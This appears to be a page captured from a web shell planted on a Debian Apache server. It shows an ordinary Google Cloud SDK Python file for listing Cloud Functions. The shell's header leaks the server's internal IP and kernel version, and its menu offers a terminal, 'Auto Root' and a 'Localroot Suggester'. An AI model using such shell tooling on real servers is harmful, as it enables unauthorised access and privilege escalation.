Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
google-cloud-sdk /
lib /
surface /
functions /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
event_types
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
local
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
logs
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
regions
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
runtimes
[ DIR ]
drwxr-xr-x
2026-06-08 18:08
__init__.py
1.38
KB
-rw-r--r--
1980-01-01 08:00
add_iam_policy_binding.py
2.24
KB
-rw-r--r--
1980-01-01 08:00
add_invoker_policy_binding.py
3.1
KB
-rw-r--r--
1980-01-01 08:00
call.py
2.75
KB
-rw-r--r--
1980-01-01 08:00
delete.py
1.68
KB
-rw-r--r--
1980-01-01 08:00
deploy.py
6.35
KB
-rw-r--r--
1980-01-01 08:00
describe.py
3.69
KB
-rw-r--r--
1980-01-01 08:00
detach.py
4.32
KB
-rw-r--r--
1980-01-01 08:00
get_iam_policy.py
1.92
KB
-rw-r--r--
1980-01-01 08:00
list.py
4.76
KB
-rw-r--r--
1980-01-01 08:00
remove_iam_policy_binding.py
2.27
KB
-rw-r--r--
1980-01-01 08:00
remove_invoker_policy_binding.py
3.22
KB
-rw-r--r--
1980-01-01 08:00
set_iam_policy.py
1.99
KB
-rw-r--r--
1980-01-01 08:00
upgrade.py
15.22
KB
-rw-r--r--
1980-01-01 08:00
Save
Rename
# -*- coding: utf-8 -*- # # Copyright 2015 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Lists Google Cloud Functions.""" import itertools from googlecloudsdk.api_lib.functions import transforms from googlecloudsdk.api_lib.functions.v1 import util as api_util_v1 from googlecloudsdk.calliope import arg_parsers from googlecloudsdk.calliope import base from googlecloudsdk.calliope import parser_extensions from googlecloudsdk.command_lib.functions import flags from googlecloudsdk.command_lib.functions.v1 import decorator as decorator_v1 from googlecloudsdk.command_lib.functions.v1.list import command as command_v1 from googlecloudsdk.command_lib.functions.v2.list import command as command_v2 @base.DefaultUniverseOnly @base.ReleaseTracks(base.ReleaseTrack.GA) class List(base.ListCommand): """List Google Cloud Functions.""" @staticmethod def Args(parser): parser.add_argument( '--regions', metavar='REGION', help=( 'Regions containing functions to list. By default, functions ' 'from the region configured in [functions/region] property are ' 'listed.' ), type=arg_parsers.ArgList(min_length=1), default=['-'], ) flags.AddV2Flag(parser) parser.display_info.AddFormat(""" table( name.basename():sort=1, state():label=STATE, trigger():label=TRIGGER, name.scope("locations").segment(0):label=REGION, generation():label=ENVIRONMENT )""") base.URI_FLAG.RemoveFromParser(parser) def Run(self, args): if args.v2: return command_v2.Run(args, self.ReleaseTrack()) list_v2_generator = command_v2.Run( args, self.ReleaseTrack(), 'environment="GEN_2"' ) v1_regions = [r.locationId for r in api_util_v1.ListRegions()] # Make a copy of the args for v1 that excludes v2-only regions. # '-' is the default value, which corresponds to all regions. list_v1_args = parser_extensions.Namespace( limit=args.limit, regions=[r for r in args.regions if r == '-' or r in v1_regions], ) list_v1_generator = command_v1.Run(list_v1_args) # respect the user overrides for all other cases. return itertools.chain(list_v2_generator, list_v1_generator) @base.ReleaseTracks(base.ReleaseTrack.BETA) class ListBeta(List): """List Google Cloud Functions.""" @staticmethod def Args(parser): parser.add_argument( '--regions', metavar='REGION', help=( 'Regions containing functions to list. By default, functions ' 'from the region configured in [functions/region] property are ' 'listed.' ), type=arg_parsers.ArgList(min_length=1), default=['-'], ) flags.AddV2Flag(parser) parser.display_info.AddTransforms(transforms.GetTransformsBeta()) parser.display_info.AddFormat(""" table( name.basename():sort=1, state():label=STATE, trigger():label=TRIGGER, name.scope("locations").segment(0):label=REGION, generation():label=ENVIRONMENT, upgradestate():label=UPGRADE_STATE )""") base.URI_FLAG.RemoveFromParser(parser) def Run(self, args): if args.v2: return command_v2.Run(args, self.ReleaseTrack()) list_gen2_generator_v2 = command_v2.Run( args, self.ReleaseTrack(), 'environment="GEN_2"', ) v1_regions = [r.locationId for r in api_util_v1.ListRegions()] # Make a copy of the args for v1 that excludes v2-only regions. # '-' is the default value, which corresponds to all regions. gen1_regions = [r for r in args.regions if r == '-' or r in v1_regions] gen1_args = parser_extensions.Namespace( limit=args.limit, regions=gen1_regions, ) list_gen1_generator_v1 = command_v1.Run(gen1_args) list_gen1_generator_v2 = command_v2.Run( gen1_args, self.ReleaseTrack(), 'environment="GEN_1"', ) return itertools.chain( list_gen2_generator_v2, decorator_v1.decorate_v1_generator_with_v2_api_info( list_gen1_generator_v1, list_gen1_generator_v2 ), ) @base.ReleaseTracks(base.ReleaseTrack.ALPHA) class ListAlpha(ListBeta): """List Google Cloud Functions."""